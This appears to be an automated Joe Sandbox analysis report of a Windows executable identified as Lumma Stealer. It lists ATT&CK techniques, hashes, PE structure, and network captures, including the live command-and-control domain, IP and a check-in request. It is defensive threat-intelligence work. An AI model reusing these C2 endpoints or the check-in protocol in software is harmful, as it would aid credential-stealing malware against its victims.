Discovery: Security Software Discovery (631); Virtualization/Sandbox Evasion (24); Process Discovery (2); System Information Discovery (223); Internet Connection Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction
Antivirus, machine learning and genetic detection (source, detection, scanner, label):
file.exe: 100%, Avira, TR/Crypt.TPM.Gen
file.exe: 100%, Joe Sandbox ML
No antivirus matches in the remaining three categories (dropped files, unpacked PE files, domains)

URL checks (source, detection, scanner, label):
https://tail-cease.cyou/: 0%, Avira URL Cloud, safe
https://tail-cease.cyou/api: 0%, Avira URL Cloud, safe
https://tail-cease.cyou/d: 0%, Avira URL Cloud, safe
https://tail-cease.cyou/b: 0%, Avira URL Cloud, safe
https://tail-cease.cyou:443/apia/: 0%, Avira URL Cloud, safe
Contacted domains (name, IP, active, malicious, reputation):
tail-cease.cyou: 104.21.93.105; active: true; malicious: true; reputation: unknown

Contacted URLs (name, malicious, antivirus detection, reputation):
https://tail-cease.cyou/api: malicious: true; Avira URL Cloud: safe; reputation: unknown

URLs found in binary or memory strings (name, source, malicious, antivirus detection, reputation):
https://tail-cease.cyou/: source file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: safe; reputation: unknown
https://tail-cease.cyou:443/apia/: source file.exe, 00000000.00000003.1742300907.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B83000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: safe; reputation: unknown
https://tail-cease.cyou/d: source file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: safe; reputation: unknown
https://tail-cease.cyou/b: source file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp; malicious: false; Avira URL Cloud: safe; reputation: unknown
Contacted IPs (IP, domain, country, ASN, ASN name, malicious):
104.21.93.105: tail-cease.cyou; United States; ASN 13335 CLOUDFLARENETUS; malicious: true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1561211
Start date and time: 2024-11-22 22:38:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.evad.winEXE@1/0@1/1
EGA Information:
  • Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: file.exe
Timeline (time, type, description):
16:39:01 | API Interceptor | 2x Sleep call for process: file.exe modified
Context: other samples sharing indicators with this analysis (match, associated sample name / URL, detection, threat name, related IP)

IP match 104.21.93.105:
  https://tracker.club-os.com/campaign/click?msgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=//clickbankbestpick.com/12/12/12/dhytfghj/test.test@test.com : malicious, HTMLPhisher
  https://oneweeknoticeperiod.com/iujfndhS/jsdsuefef/new7dbfbfr/elon7maskup/test.test@test.com : malicious, HTMLPhisher

Domain match: no context

ASN match CLOUDFLARENETUS:
  http://www.buildermax.in/002/ww.htm : malicious, HTMLPhisher (104.17.25.14)
  PDQConnectAgent-4.3.4.msi : malicious, Unknown (104.16.77.47)
  Installer.exe : malicious, LummaC (172.67.155.248)
  Installer.exe : malicious, LummaC (104.21.66.38)
  https://docs.google.com/presentation/d/1z_B5nVWxQSqBMnIWjAfO37AM3HSOm_XjEmM3UM39DA0/preview : malicious, Unknown (104.22.78.164)
  file.exe : malicious, LummaC Stealer (172.67.162.84)
  setup.exe : malicious, LummaC (172.67.135.40)
  https://sendbot.me/seuemprestimogarantido : malicious, Unknown (172.67.74.152)
  https://sendbot.me/seuemprestimogarantido : malicious, Unknown (172.67.74.152)
  8347392490280.pdf : malicious, KnowBe4, PDFPhish (104.17.25.14)

JA3 fingerprint match a0e9f5d64349fb13191bc781f81f42e1:
  Installer.exe : malicious, LummaC (104.21.93.105)
  Installer.exe : malicious, LummaC (104.21.93.105)
  file.exe : malicious, LummaC Stealer (104.21.93.105)
  setup.exe : malicious, LummaC (104.21.93.105)
  SeT_up.exe : malicious, LummaC Stealer (104.21.93.105)
  file.exe : malicious, Amadey, Credential Flusher, LummaC Stealer, Stealc (104.21.93.105)
  Setup.exe : malicious, LummaC (104.21.93.105)
  Set-up.exe : malicious, LummaC (104.21.93.105)
  Set-up.exe : malicious, LummaC (104.21.93.105)
  Setup.exe : malicious, LummaC (104.21.93.105)

Dropped files: no context
        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.94942929015148
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'897'984 bytes
MD5: 8d5f9df92d2fb9c40125d06c7e3c66be
SHA1: 0e90f85e420a9231cefbf51d9cf6f9dddfb42aa7
SHA256: 32ffca83244f63bde5db2ae85aa691a68a2725199ffc4abbcbdab29b9fda8707
SHA512: 89c7c2269776d24f5dc109de9d3a072a87111bfa3cd7900882d7dc01e1ddc790534f4493e19898d02d8284ab80914641faec2acd735bbc5de44738f239fbe422
SSDEEP: 24576:DQo2l2Ty1bxMt2xo+hnzLritdli2aqCr5da0qtMu2LpJBK+GVmnR04PJOhpLnWDn:DQohFao+VwdBN0qtMu2tJxHxPomVN
TLSH: 85953367CBE7A714C39989B044356A3B4710E8FA41D24C2175AFB1384E23982BB97FD7
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................@K...........@..........................pK.....+.....@.................................\...p..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x8b4000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Entrypoint preview (instructions):
        jmp 00007F274890E9AAh
        paddq mm3, qword ptr [eax+eax]
        add byte ptr [eax], al
        add byte ptr [eax], al
        jmp 00007F27489109A5h
        add byte ptr [esi], al
        or al, byte ptr [eax]
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], dh
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax+eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        and al, byte ptr [eax]
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add dword ptr [eax+00000000h], eax
        add byte ptr [eax], al
        adc byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add dword ptr [edx], ecx
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        Name | Virtual Address | Virtual Size | Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5805c | 0x70 | .idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x2b0 | .rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x581f8 | 0x8 | .idata
        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
        (unprintable name) | 0x1000 | 0x56000 | 0x26200 | 23c56bb760a48cfc9924a72f6f1518c3 | False | 0.9991995389344263 | data | 7.97509167370507 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc | 0x57000 | 0x2b0 | 0x200 | 7f6f412337e0d4b586ecb7834bac25c1 | False | 0.791015625 | data | 5.999501407622915 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata | 0x58000 | 0x1000 | 0x200 | c92ced077364b300efd06b14c70a61dc | False | 0.15625 | data | 1.1194718105633323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        (unprintable name) | 0x59000 | 0x2b4000 | 0x200 | 103874d23beeb69f3380f760f64d1ed1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        jobzmdtd | 0x30d000 | 0x1a6000 | 0x1a5600 | 55e2544e7ce616b59cd982974f2e2fa2 | False | 0.9945954464550578 | data | 7.954231338425638 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        izjuqqoh | 0x4b3000 | 0x1000 | 0x600 | c59e0cd6aac20884dfdc4184ec0448a8 | False | 0.5618489583333334 | data | 4.889124756304121 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .taggant | 0x4b4000 | 0x3000 | 0x2200 | ffc756c39b204e9d41e132265b247431 | False | 0.07065716911764706 | DOS executable (COM) | 0.7934008209522593 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
        RT_MANIFEST | 0x4b22dc | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
        DLL | Import
        kernel32.dll | lstrcpy
        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
        2024-11-22T22:39:00.940600+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.93.105 | 443 | TCP
        2024-11-22T22:39:01.897959+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.93.105 | 443 | TCP
        2024-11-22T22:39:01.897959+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.93.105 | 443 | TCP
        2024-11-22T22:39:03.182137+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.93.105 | 443 | TCP
        Timestamp | Source Port | Dest Port | Source IP | Dest IP
        Nov 22, 2024 22:38:59.617043972 CET | 49730 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:38:59.617078066 CET | 443 | 49730 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:38:59.617414951 CET | 49730 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:38:59.621222973 CET | 49730 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:38:59.621237040 CET | 443 | 49730 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:39:00.940366030 CET | 443 | 49730 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:39:00.940599918 CET | 49730 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:39:00.973649979 CET | 49730 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:39:00.973668098 CET | 443 | 49730 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:39:00.973910093 CET | 443 | 49730 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:39:01.019774914 CET | 49730 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:39:01.150022030 CET | 49730 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:39:01.150074959 CET | 49730 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:39:01.150115013 CET | 443 | 49730 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:39:01.897800922 CET | 443 | 49730 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:39:01.897890091 CET | 443 | 49730 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:39:01.898107052 CET | 49730 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:39:01.901232958 CET | 49730 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:39:01.901248932 CET | 443 | 49730 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:39:01.960361004 CET | 49731 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:39:01.960433006 CET | 443 | 49731 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:39:01.960737944 CET | 49731 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:39:01.961029053 CET | 49731 | 443 | 192.168.2.4 | 104.21.93.105
        Nov 22, 2024 22:39:01.961050034 CET | 443 | 49731 | 104.21.93.105 | 192.168.2.4
        Nov 22, 2024 22:39:03.182137012 CET | 49731 | 443 | 192.168.2.4 | 104.21.93.105
        Timestamp | Source Port | Dest Port | Source IP | Dest IP
        Nov 22, 2024 22:38:59.168389082 CET | 50937 | 53 | 192.168.2.4 | 1.1.1.1
        Nov 22, 2024 22:38:59.609025955 CET | 53 | 50937 | 1.1.1.1 | 192.168.2.4
        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
        Nov 22, 2024 22:38:59.168389082 CET | 192.168.2.4 | 1.1.1.1 | 0xee96 | Standard query (0) | tail-cease.cyou | A (IP address) | IN (0x0001) | false
        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
        Nov 22, 2024 22:38:59.609025955 CET | 1.1.1.1 | 192.168.2.4 | 0xee96 | No error (0) | tail-cease.cyou | | 104.21.93.105 | A (IP address) | IN (0x0001) | false
        Nov 22, 2024 22:38:59.609025955 CET | 1.1.1.1 | 192.168.2.4 | 0xee96 | No error (0) | tail-cease.cyou | | 172.67.208.213 | A (IP address) | IN (0x0001) | false
        • tail-cease.cyou
        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        0 | 192.168.2.4 | 49730 | 104.21.93.105 | 443 | 7044 | C:\Users\user\Desktop\file.exe
        Timestamp | Bytes transferred | Direction | Data
        2024-11-22 21:39:01 UTC | 262 | OUT
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Content-Length: 8
        Host: tail-cease.cyou
        2024-11-22 21:39:01 UTC | 8 | OUT
        Data Raw: 61 63 74 3d 6c 69 66 65
        Data Ascii: act=life
        2024-11-22 21:39:01 UTC | 1003 | IN
        HTTP/1.1 200 OK
        Date: Fri, 22 Nov 2024 21:39:01 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Set-Cookie: PHPSESSID=cjatrnfm73551kusi4rvclg1en; expires=Tue, 18-Mar-2025 15:25:40 GMT; Max-Age=9999999; path=/
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate
        Pragma: no-cache
        cf-cache-status: DYNAMIC
        vary: accept-encoding
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQG5lyhPLAejNHnFsPBfoCvppyNZwxsv33HwFCWHjCwc0sIhjBSVaVo9mM23TAq71a6hF3mIRYWOqsM9ajIRPJmewXkzq7NLif9BSVY8BiMkV8JRrW2hamDpcon7RQWmrRA%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 8e6c11dd3c45c44f-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1508&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1888745&cwnd=251&unsent_bytes=0&cid=b2b5cb8cc6b765a4&ts=972&x=0"
        2024-11-22 21:39:01 UTC | 7 | IN
        Data Raw: 32 0d 0a 6f 6b 0d 0a
        Data Ascii: 2ok
        2024-11-22 21:39:01 UTC | 5 | IN
        Data Raw: 30 0d 0a 0d 0a
        Data Ascii: 0



        Target ID: 0
        Start time: 16:38:54
        Start date: 22/11/2024
        Path: C:\Users\user\Desktop\file.exe
        Wow64 process (32bit): true
        Commandline: "C:\Users\user\Desktop\file.exe"
        Imagebase: 0x140000
        File size: 1'897'984 bytes
        MD5 hash: 8D5F9DF92D2FB9C40125D06C7E3C66BE
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: C, C++ or other language
        Reputation: low
        Has exited: true


          Execution Graph

          Execution Coverage: 2.9%
          Dynamic/Decrypted Code Coverage: 0%
          Signature Coverage: 55.2%
          Total number of Nodes: 58
          Total number of Limit Nodes: 1

          Control-flow Graph (function 179030)
          APIs
          • SysAllocString.OLEAUT32(13C511C2), ref: 001791B7
          • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001791FD
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          • Associated: 00000000.00000002.1742913628.0000000000140000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742925880.0000000000185000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742968509.0000000000197000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000032F000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000040D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.0000000000436000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000043D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1742980653.000000000044D000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743209884.000000000044E000.00000080.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743324041.00000000005F3000.00000040.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.1743337248.00000000005F4000.00000080.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_140000_file.jbxd
          Similarity
          • API ID: AllocBlanketProxyString
          • String ID: =3$E!q#$E!q#$Lgfe$\$IK
          • API String ID: 900851650-3206278330
          • Opcode ID: f8891f24853018c478dc7a88bf0d2ba71238458a113bbb424a57b3f5b9c1308d
          • Instruction ID: 922c80a76a6a30f35463c438b19c591cbe51982d0594f45e3b20e1ff80c63f8e
          • Opcode Fuzzy Hash: f8891f24853018c478dc7a88bf0d2ba71238458a113bbb424a57b3f5b9c1308d
          • Instruction Fuzzy Hash: 592242B19083109BE324CF24C881B6BBBF6EF95314F148A1CF5999B2D1E775D909CB92

          Control-flow Graph (function 14cf05)
          Similarity
          • API ID:
          • String ID: ()$+S7U$,_"Q$0C%E$7W"i$;[*]$<KuM$B9CA0F78B9CB51ACD7CBBD6DF28D3732$N3F5$S7HI$tail-cease.cyou$y?O1$c]e$gy
          • API String ID: 0-4174026600
          • Opcode ID: 8b9876a586aa645a9a866b45d70e246b95d2c2985754366879d96441ead37971
          • Instruction ID: 94eb3708bbc451467d04ed4419f07c29fcd6d57684eb565d6156b71a5b3f28cb
          • Opcode Fuzzy Hash: 8b9876a586aa645a9a866b45d70e246b95d2c2985754366879d96441ead37971
          • Instruction Fuzzy Hash: 69120CB16483C18ED734CF25D495BEFBBE1ABD2304F18895CC4DA5B262C775090ACB92

          Control-flow Graph (function 1489a0)
          APIs
          • ExitProcess.KERNEL32(00000000), ref: 00148CB6
          Similarity
          • API ID: ExitProcess
          • String ID:
          • API String ID: 621844428-0
          • Opcode ID: 12b1112140b16a7461ebbf6942f0985698c826292ff001a3cba4049c90e2bc6e
          • Instruction ID: 12181461fa026fdbf4feca05f5c05052b5dec3aaa7161593ecbe01ce5dc24443
          • Opcode Fuzzy Hash: 12b1112140b16a7461ebbf6942f0985698c826292ff001a3cba4049c90e2bc6e
          • Instruction Fuzzy Hash: 3B71F273B547044BC708DEAAD89236BFAD2ABC8714F09D83D6898D7390EAB89C054685

          Control-flow Graph (function 17df70)
          APIs
          • LdrInitializeThunk.NTDLL(0017BA46,?,00000010,00000005,00000000,?,00000000,?,?,00159158,?,?,001519B4), ref: 0017DF9E
          Similarity
          • API ID: InitializeThunk
          • String ID:
          • API String ID: 2994545307-0
          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

          Control-flow Graph (function 17b7e0)
          APIs
          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0017B84E
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: 9407317cec04aee758837317dcc12718d7925702db78179cb0d5fa64889216ac
          • Instruction ID: eed3d0bca7b4d3a6a7f32598bef50888fbb8492dde4ed14cc57ecf538181aef8
          • Opcode Fuzzy Hash: 9407317cec04aee758837317dcc12718d7925702db78179cb0d5fa64889216ac
          • Instruction Fuzzy Hash: D7017B33A457040BC300AE7CDCD4646BB56EFD9224F29463DE5D4873D0D631991A8296

          Control-flow Graph (function 14ce80)
          APIs
          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0014CE94
          Similarity
          • API ID: Initialize
          • String ID:
          • API String ID: 2538663250-0
          • Opcode ID: b8713780a0a58de21ea8860542fbce7bb23dcf64d1d0b811d02a5cc95239a8a4
          • Instruction ID: 23fd7b8d9baa7bae52974f15fcc6be960e53d73b125b35bea9cac46ccd9d2991
          • Opcode Fuzzy Hash: b8713780a0a58de21ea8860542fbce7bb23dcf64d1d0b811d02a5cc95239a8a4
          • Instruction Fuzzy Hash: 15D0A73139024877D114A61CEC57F27325DC702754F440626B762CA6C2D951AA15C16A

          Control-flow Graph (function 14ceb3)
          APIs
          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0014CEC6
          Similarity
          • API ID: InitializeSecurity
          • String ID:
          • API String ID: 640775948-0

          Control-flow Graph
          • Node 265: 14d7d2-14d7d8 CoUninitialize
          • Node 266: 14d7da-14d7e1
          • Edge: 265->266
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID: Uninitialize
          • String ID:
          • API String ID: 3861434553-0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID: AllocateHeap
          • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
          • API String ID: 1279760036-1524723224
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
          • API String ID: 0-1787199350
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: 7[$(N$(kow$1V{}$WZg$vOn$wvWo$+nk$yy
          • API String ID: 0-917056455
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742925880.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: B9CA0F78B9CB51ACD7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
          • API String ID: 0-3274074491
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: 2_$._A$aym$k%du$rg$<{$<{$|>
          • API String ID: 0-3842270736
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1742980653.0000000000199000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
          Similarity
          • API ID:
          • String ID: OM\z$cc=N$w&ug$w&ug$}T\$@c
          • API String ID: 0-3354798563
          Strings
          Memory Dump Source
